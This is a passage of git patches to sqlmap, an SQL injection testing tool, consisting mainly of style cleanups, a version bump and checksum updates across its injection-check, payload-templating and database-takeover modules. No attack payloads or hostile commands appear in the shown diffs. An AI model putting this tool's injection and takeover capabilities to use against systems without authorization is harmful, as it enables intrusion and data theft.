conf.direct = "%s////%s" % (_[0], os.path.abspath(self.db)) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 6ec32bb0ab7..9c99b170d66 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -26,9 +26,9 @@ e8533a8a406fe58cc610337639ed4bb1 lib/controller/checks.py a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 052c368ae6ca09362a19376c8483fa85 lib/core/agent.py -86a4703d5474badd8462146510b2c460 lib/core/bigarray.py -80087ee0716904b24c7970beed20cf27 lib/core/common.py -2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py +591c66fa439a48b7d8b5b581437cd14d lib/core/bigarray.py +6e41ff058eb86b824215c19a3ae4de3c lib/core/common.py +2910524e4478be6b5893fb9d851a62ec lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 12e80071013606f01822c3823fb51054 lib/core/decorators.py @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 63ac6631d75e4f7c20b946a0c06bad33 lib/core/optiondict.py -a377168b153725d3677924040b7861f4 lib/core/option.py +8a9346b975931d8d995354692ab68f82 lib/core/option.py 7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8e9da51e9fb8e345f5a8bde0f219b696 lib/core/settings.py +aef027eeb51df0bb7330bf35725dba66 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py @@ -54,21 +54,21 @@ d0adc28a38e43a787df4471f7f027413 lib/core/shell.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py 1b655a78fe4d937d39131938a4a5a1d6 lib/core/update.py -fc624104ddb36d41794b7a943fde5f21 lib/core/wordlist.py +e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -27c4d3e568d199e01d1cffd37b370516 lib/parse/cmdline.py +d505c725f5d6887ec80b5b94ca1dc9f5 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 263ee1cec41facd2a06d0dc887b207ad lib/parse/headers.py 33f21b11b7963062df8fa2292229df80 lib/parse/html.py 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py -307d4001682f38dd574548d98c0f1c3e lib/parse/payloads.py -38563853a32dd677ce6c65a0945d7227 lib/parse/sitemap.py -4e60fe7c94bbfa631087ed3426df8ef0 lib/request/basicauthhandler.py +ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py +492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py +30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -9b31df4b00b1709948e7f0568d69d7de lib/request/connect.py +94c0ce8d2a2d9001a416420f61b67ee7 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py a1436e4e4f9b636cb8332f00b686bfd5 lib/request/httpshandler.py @@ -98,13 +98,13 @@ b84d45fc7349caa714f9769b13d70cab lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py da5a117fb64723e6c815b0e33d50f66a lib/techniques/union/test.py ac67ebbabd06bf9853befc65ad49679e lib/techniques/union/use.py -e4146464cf968d4015a52cb8c10e3da5 lib/utils/api.py +609ba6e5039de4814115b966cd72645a lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py 69c25da85a3a71a9798804075cdfd62b lib/utils/deps.py a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py -9bd8fbfb9c25ee685c97b260331e7165 lib/utils/hashdb.py +062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py 55c552e754b54cd25a47efb84d3e6892 lib/utils/hash.py 145120b21fcfca843d5e2c8b0562e4db lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py @@ -112,7 +112,7 @@ a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 5d6d73d27833eef1b10b9215629533ff lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 4a6886d3a0c7bf768df97738fa257de9 lib/utils/search.py -4b17311256f0081904a67831252e3fb9 lib/utils/sqlalchemy.py +236a8d9e596602b53f8e0aa09c30c0ef lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py ce5ec6300bc0a185827a21d8a8f09de3 lib/utils/versioncheck.py 1e9cf437451ff8147a372a002641b963 lib/utils/xrange.py From 8166a4eeb814314a2b23331453df3aaf2dd83563 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Mar 2018 11:25:26 +0100 Subject: [PATCH 067/428] Minor PEPing --- lib/core/common.py | 26 +++++++++++++------------- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 16 insertions(+), 16 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index c9ad85a2545..3f307b1d279 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1443,13 +1443,14 @@ def parseTargetUrl(): conf.hostname = conf.hostname.strip("[]").replace(kb.customInjectionMark, "") try: - _ = conf.hostname.encode("idna") - except LookupError: - _ = conf.hostname.encode(UNICODE_ENCODING) - except UnicodeError: - _ = None + conf.hostname.encode("idna") + conf.hostname.encode(UNICODE_ENCODING) + except (LookupError, UnicodeError): + invalid = True + else: + invalid = False - if any((_ is None, re.search(r"\s", conf.hostname), '..' in conf.hostname, conf.hostname.startswith('.'), '\n' in originalUrl)): + if any((invalid, re.search(r"\s", conf.hostname), '..' in conf.hostname, conf.hostname.startswith('.'), '\n' in originalUrl)): errMsg = "invalid target URL ('%s')" % originalUrl raise SqlmapSyntaxException(errMsg) @@ -2994,7 +2995,7 @@ def setOptimize(): Sets options turned on by switch '-o' """ - #conf.predictOutput = True + # conf.predictOutput = True conf.keepAlive = True conf.threads = 3 if conf.threads < 3 else conf.threads conf.nullConnection = not any((conf.data, conf.textOnly, conf.titles, conf.string, conf.notString, conf.regexp, conf.tor)) @@ -3198,9 +3199,7 @@ def showHttpErrorCodes(): if kb.httpErrorCodes: warnMsg = "HTTP error codes detected during run:\n" - warnMsg += ", ".join("%d (%s) - %d times" % (code, httplib.responses[code] \ - if code in httplib.responses else '?', count) \ - for code, count in kb.httpErrorCodes.items()) + warnMsg += ", ".join("%d (%s) - %d times" % (code, httplib.responses[code] if code in httplib.responses else '?', count) for code, count in kb.httpErrorCodes.items()) logger.warn(warnMsg) if any((str(_).startswith('4') or str(_).startswith('5')) and _ != httplib.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes.keys()): msg = "too many 4xx and/or 5xx HTTP error codes " @@ -3216,8 +3215,7 @@ def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", bu return codecs.open(filename, mode, encoding, errors, buffering) except IOError: errMsg = "there has been a file opening error for filename '%s'. " % filename - errMsg += "Please check %s permissions on a file " % ("write" if \ - mode and ('w' in mode or 'a' in mode or '+' in mode) else "read") + errMsg += "Please check %s permissions on a file " % ("write" if mode and ('w' in mode or 'a' in mode or '+' in mode) else "read") errMsg += "and that it's not locked by another process." raise SqlmapSystemException(errMsg) @@ -4350,7 +4348,9 @@ def prioritySortColumns(columns): ['userid', 'name', 'password'] """ - _ = lambda x: x and "id" in x.lower() + def _(column): + return column and "id" in column.lower() + return sorted(sorted(columns, key=len), lambda x, y: -1 if _(x) and not _(y) else 1 if not _(x) and _(y) else 0) def getRequestHeader(request, name): diff --git a/lib/core/settings.py b/lib/core/settings.py index 1d44c80a3e4..93439d4abef 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.21" +VERSION = "1.2.3.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9c99b170d66..dcb2f4f475c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 052c368ae6ca09362a19376c8483fa85 lib/core/agent.py 591c66fa439a48b7d8b5b581437cd14d lib/core/bigarray.py -6e41ff058eb86b824215c19a3ae4de3c lib/core/common.py +33c03aad7f4c6e7241b6f204560e69ca lib/core/common.py 2910524e4478be6b5893fb9d851a62ec lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -aef027eeb51df0bb7330bf35725dba66 lib/core/settings.py +053e81e44a3df054a3ffd39d58de7079 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py From fa4c1c5251ce8faaaac2bd9b5ccb5deffd4e074d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Mar 2018 13:45:42 +0100 Subject: [PATCH 068/428] Some more PEPing (I hope that I haven't broke anything) --- lib/controller/checks.py | 28 +- lib/controller/controller.py | 3 +- lib/controller/handler.py | 26 +- lib/core/agent.py | 24 +- lib/core/bigarray.py | 4 +- lib/core/convert.py | 2 +- lib/core/defaults.py | 28 +- lib/core/dicts.py | 82 ++-- lib/core/enums.py | 56 +-- lib/core/option.py | 6 +- lib/core/optiondict.py | 496 +++++++++++------------ lib/core/profiling.py | 2 +- lib/core/settings.py | 4 +- lib/core/shell.py | 20 +- lib/core/subprocessng.py | 6 - lib/core/target.py | 11 +- lib/parse/cmdline.py | 420 ++++++++------------ lib/parse/headers.py | 12 +- lib/request/basic.py | 6 +- lib/request/connect.py | 45 ++- lib/request/httpshandler.py | 2 +- lib/request/inject.py | 5 +- lib/request/templates.py | 1 - lib/takeover/abstraction.py | 6 +- lib/takeover/metasploit.py | 104 ++--- lib/takeover/registry.py | 18 +- lib/takeover/web.py | 8 +- lib/takeover/xp_cmdshell.py | 2 +- lib/techniques/blind/inference.py | 2 +- lib/techniques/error/use.py | 30 +- lib/techniques/union/use.py | 8 +- lib/utils/api.py | 25 +- lib/utils/crawler.py | 2 +- lib/utils/deps.py | 1 - lib/utils/getch.py | 5 +- lib/utils/hash.py | 71 ++-- lib/utils/htmlentities.py | 504 ++++++++++++------------ lib/utils/progress.py | 3 +- lib/utils/versioncheck.py | 2 +- lib/utils/xrange.py | 2 +- plugins/dbms/access/fingerprint.py | 11 +- plugins/dbms/db2/connector.py | 1 - plugins/dbms/db2/fingerprint.py | 12 +- plugins/dbms/firebird/connector.py | 4 +- plugins/dbms/firebird/fingerprint.py | 12 +- plugins/dbms/hsqldb/connector.py | 9 +- plugins/dbms/informix/connector.py | 1 - plugins/dbms/informix/syntax.py | 2 +- plugins/dbms/maxdb/enumeration.py | 6 +- plugins/dbms/mssqlserver/enumeration.py | 6 +- plugins/dbms/mssqlserver/filesystem.py | 70 ++-- plugins/dbms/mssqlserver/fingerprint.py | 32 +- plugins/dbms/mssqlserver/takeover.py | 25 +- plugins/dbms/mysql/__init__.py | 10 +- plugins/dbms/mysql/fingerprint.py | 25 +- plugins/dbms/mysql/takeover.py | 4 +- plugins/dbms/postgresql/__init__.py | 12 +- plugins/dbms/postgresql/syntax.py | 2 +- plugins/dbms/sybase/enumeration.py | 2 +- plugins/generic/databases.py | 13 +- plugins/generic/entries.py | 2 +- plugins/generic/filesystem.py | 2 +- tamper/between.py | 1 - tamper/ifnull2casewhenisnull.py | 2 - txt/checksum.md5 | 130 +++--- waf/safe3.py | 1 - 66 files changed, 1174 insertions(+), 1305 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 26fcb4f3c11..4733f178b90 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -146,8 +146,7 @@ def checkSqlInjection(place, parameter, value): # error message, simple heuristic check or via DBMS-specific # payload), ask the user to limit the tests to the fingerprinted # DBMS - if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \ - SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms): + if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms): msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms) msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]" kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else [] @@ -156,9 +155,7 @@ def checkSqlInjection(place, parameter, value): # message, via simple heuristic check or via DBMS-specific # payload), ask the user to extend the tests to all DBMS-specific, # regardless of --level and --risk values provided - if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \ - and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \ - kb.heuristicDbms or injection.dbms): + if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms): msg = "for the remaining tests, do you want to include all tests " msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms) msg += "level (%d)" % conf.level if conf.level < 5 else "" @@ -242,9 +239,7 @@ def checkSqlInjection(place, parameter, value): # Skip tests if title, vector or DBMS is not included by the # given test filter - if conf.testFilter and not any(conf.testFilter in str(item) or \ - re.search(conf.testFilter, str(item), re.I) for item in \ - (test.title, test.vector, payloadDbms)): + if conf.testFilter and not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, payloadDbms)): debugMsg = "skipping test '%s' because its " % title debugMsg += "name/vector/DBMS is not included by the given filter" logger.debug(debugMsg) @@ -252,9 +247,7 @@ def checkSqlInjection(place, parameter, value): # Skip tests if title, vector or DBMS is included by the # given skip filter - if conf.testSkip and any(conf.testSkip in str(item) or \ - re.search(conf.testSkip, str(item), re.I) for item in \ - (test.title, test.vector, payloadDbms)): + if conf.testSkip and any(conf.testSkip in str(item) or re.search(conf.testSkip, str(item), re.I) for item in (test.title, test.vector, payloadDbms)): debugMsg = "skipping test '%s' because its " % title debugMsg += "name/vector/DBMS is included by the given skip filter" logger.debug(debugMsg) @@ -588,10 +581,10 @@ def genCmpPayload(): # body for the test's regular expression try: page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False) - output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(check, listToStrValue((headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) + output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) + output = output or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) + output = output or extractRegexResult(check, listToStrValue((headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE) + output = output or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) if output: result = output == "1" @@ -873,8 +866,7 @@ def checkFalsePositives(injection): retVal = True - if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\ - (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title): + if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title): pushValue(kb.injection) infoMsg = "checking if the injection point on %s " % injection.place @@ -971,7 +963,7 @@ def checkFilteredChars(injection): # inference techniques depend on character '>' if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)): - if not checkBooleanExpression("%d>%d" % (randInt+1, randInt)): + if not checkBooleanExpression("%d>%d" % (randInt + 1, randInt)): warnMsg = "it appears that the character '>' is " warnMsg += "filtered by the back-end server. You are strongly " warnMsg += "advised to rerun with the '--tamper=between'" diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 27708c86784..cbe5aef917e 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -406,8 +406,7 @@ def start(): if conf.nullConnection: checkNullConnection() - if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \ - and (kb.injection.place is None or kb.injection.parameter is None): + if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) and (kb.injection.place is None or kb.injection.parameter is None): if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech: # NOTE: this is not needed anymore, leaving only to display diff --git a/lib/controller/handler.py b/lib/controller/handler.py index 988efd12c1c..6ce752dd28e 100644 --- a/lib/controller/handler.py +++ b/lib/controller/handler.py @@ -56,19 +56,19 @@ def setHandler(): """ items = [ - (DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn), - (DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn), - (DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn), - (DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn), - (DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn), - (DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn), - (DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn), - (DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn), - (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn), - (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn), - (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn), - (DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn), - ] + (DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn), + (DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn), + (DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn), + (DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn), + (DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn), + (DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn), + (DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn), + (DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn), + (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn), + (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn), + (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn), + (DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn), + ] _ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items) if _: diff --git a/lib/core/agent.py b/lib/core/agent.py index e8422bcc3e1..b7bb3c4ea34 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -294,17 +294,21 @@ def cleanupPayload(self, payload, origValue=None): if payload is None: return - _ = ( - ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\ - ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\ - ("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT) - ) - payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload) - - for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)): + replacements = ( + ("[DELIMITER_START]", kb.chars.start), + ("[DELIMITER_STOP]", kb.chars.stop), + ("[AT_REPLACE]", kb.chars.at), + ("[SPACE_REPLACE]", kb.chars.space), + ("[DOLLAR_REPLACE]", kb.chars.dollar), + ("[HASH_REPLACE]", kb.chars.hash_), + ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT) + ) + payload = reduce(lambda x, y: x.replace(y[0], y[1]), replacements, payload) + + for _ in set(re.findall(r"(?i)\[RANDNUM(?:\d+)?\]", payload)): payload = payload.replace(_, str(randomInt())) - for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)): + for _ in set(re.findall(r"(?i)\[RANDSTR(?:\d+)?\]", payload)): payload = payload.replace(_, randomStr()) if origValue is not None and "[ORIGVALUE]" in payload: @@ -928,7 +932,7 @@ def limitQuery(self, num, query, field=None, uniqueField=None): limitedQuery += " %s" % limitStr elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - if not " ORDER BY " in limitedQuery: + if " ORDER BY " not in limitedQuery: limitStr = limitStr.replace(") WHERE LIMIT", " ORDER BY 1 ASC) WHERE LIMIT") elif " ORDER BY " in limitedQuery and "SELECT " in limitedQuery: limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")] diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py index 33ebed67a64..f12d23148dd 100644 --- a/lib/core/bigarray.py +++ b/lib/core/bigarray.py @@ -6,9 +6,9 @@ """ try: - import cPickle as pickle + import cPickle as pickle except: - import pickle + import pickle import bz2 import itertools diff --git a/lib/core/convert.py b/lib/core/convert.py index c8ebaa0b303..7240655ef1a 100644 --- a/lib/core/convert.py +++ b/lib/core/convert.py @@ -94,7 +94,7 @@ def loads(str): try: retVal = loads(base64decode(value)) - except TypeError: + except TypeError: retVal = loads(base64decode(bytes(value))) return retVal diff --git a/lib/core/defaults.py b/lib/core/defaults.py index 209e0999e62..6c12164a155 100644 --- a/lib/core/defaults.py +++ b/lib/core/defaults.py @@ -8,20 +8,20 @@ from lib.core.datatype import AttribDict _defaults = { - "csvDel": ',', - "timeSec": 5, - "googlePage": 1, - "verbose": 1, - "delay": 0, - "timeout": 30, - "retries": 3, - "saFreq": 0, - "threads": 1, - "level": 1, - "risk": 1, - "dumpFormat": "CSV", - "tech": "BEUSTQ", - "torType": "SOCKS5", + "csvDel": ',', + "timeSec": 5, + "googlePage": 1, + "verbose": 1, + "delay": 0, + "timeout": 30, + "retries": 3, + "saFreq": 0, + "threads": 1, + "level": 1, + "risk": 1, + "dumpFormat": "CSV", + "tech": "BEUSTQ", + "torType": "SOCKS5", } defaults = AttribDict(_defaults) diff --git a/lib/core/dicts.py b/lib/core/dicts.py index d999fb07229..c07f65ff41c 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -208,54 +208,60 @@ } SQL_STATEMENTS = { - "SQL SELECT statement": ( - "select ", - "show ", - " top ", - " distinct ", - " from ", - " from dual", - " where ", - " group by ", - " order by ", - " having ", - " limit ", - " offset ", - " union all ", - " rownum as ", - "(case ", ), + "SQL SELECT statement": ( + "select ", + "show ", + " top ", + " distinct ", + " from ", + " from dual", + " where ", + " group by ", + " order by ", + " having ", + " limit ", + " offset ", + " union all ", + " rownum as ", + "(case ", + ), - "SQL data definition": ( + "SQL data definition": ( "create ", "declare ", "drop ", "truncate ", - "alter ", ), + "alter ", + ), "SQL data manipulation": ( - "bulk ", - "insert ", - "update ", - "delete ", - "merge ", - "load ", ), + "bulk ", + "insert ", + "update ", + "delete ", + "merge ", + "load ", + ), - "SQL data control": ( - "grant ", - "revoke ", ), + "SQL data control": ( + "grant ", + "revoke ", + ), - "SQL data execution": ( - "exec ", - "execute ", - "values ", - "call ", ), + "SQL data execution": ( + "exec ", + "execute ", + "values ", + "call ", + ), - "SQL transaction": ( - "start transaction ", - "begin work ", - "begin transaction ", - "commit ", - "rollback ", ), + "SQL transaction": ( + "start transaction ", + "begin work ", + "begin transaction ", + "commit ", + "rollback ", + ), } POST_HINT_CONTENT_TYPES = { diff --git a/lib/core/enums.py b/lib/core/enums.py index 7759986845f..638b80bbb63 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -242,40 +242,40 @@ class REDIRECTION: class PAYLOAD: SQLINJECTION = { - 1: "boolean-based blind", - 2: "error-based", - 3: "inline query", - 4: "stacked queries", - 5: "AND/OR time-based blind", - 6: "UNION query", - } + 1: "boolean-based blind", + 2: "error-based", + 3: "inline query", + 4: "stacked queries", + 5: "AND/OR time-based blind", + 6: "UNION query", + } PARAMETER = { - 1: "Unescaped numeric", - 2: "Single quoted string", - 3: "LIKE single quoted string", - 4: "Double quoted string", - 5: "LIKE double quoted string", - } + 1: "Unescaped numeric", + 2: "Single quoted string", + 3: "LIKE single quoted string", + 4: "Double quoted string", + 5: "LIKE double quoted string", + } RISK = { - 0: "No risk", - 1: "Low risk", - 2: "Medium risk", - 3: "High risk", - } + 0: "No risk", + 1: "Low risk", + 2: "Medium risk", + 3: "High risk", + } CLAUSE = { - 0: "Always", - 1: "WHERE", - 2: "GROUP BY", - 3: "ORDER BY", - 4: "LIMIT", - 5: "OFFSET", - 6: "TOP", - 7: "Table name", - 8: "Column name", - } + 0: "Always", + 1: "WHERE", + 2: "GROUP BY", + 3: "ORDER BY", + 4: "LIMIT", + 5: "OFFSET", + 6: "TOP", + 7: "Table name", + 8: "Column name", + } class METHOD: COMPARISON = "comparison" diff --git a/lib/core/option.py b/lib/core/option.py index e4fd1764b90..b842c890fe9 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -687,7 +687,7 @@ def _setMetasploit(): if IS_WIN: try: - import win32file + __import__("win32file") except ImportError: errMsg = "sqlmap requires third-party module 'pywin32' " errMsg += "in order to use Metasploit functionalities on " @@ -700,7 +700,7 @@ def _(key, value): retVal = None try: - from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE + from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE _ = ConnectRegistry(None, HKEY_LOCAL_MACHINE) _ = OpenKey(_, key) retVal = QueryValueEx(_, value)[0] @@ -2350,7 +2350,7 @@ def _checkWebSocket(): from websocket import ABNF except ImportError: errMsg = "sqlmap requires third-party module 'websocket-client' " - errMsg += "in order to use WebSocket funcionality" + errMsg += "in order to use WebSocket functionality" raise SqlmapMissingDependence(errMsg) def _checkTor(): diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index e71e4b3f179..b1f80398aea 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -6,250 +6,252 @@ """ optDict = { - # Format: - # Family: { "parameter name": "parameter datatype" }, - # Or: - # Family: { "parameter name": ("parameter datatype", "category name used for common outputs feature") }, - "Target": { - "direct": "string", - "url": "string", - "logFile": "string", - "bulkFile": "string", - "requestFile": "string", - "sessionFile": "string", - "googleDork": "string", - "configFile": "string", - "sitemapUrl": "string", - }, - - "Request": { - "method": "string", - "data": "string", - "paramDel": "string", - "cookie": "string", - "cookieDel": "string", - "loadCookies": "string", - "dropSetCookie": "boolean", - "agent": "string", - "randomAgent": "boolean", - "host": "string", - "referer": "string", - "headers": "string", - "authType": "string", - "authCred": "string", - "authFile": "string", - "ignoreCode": "integer", - 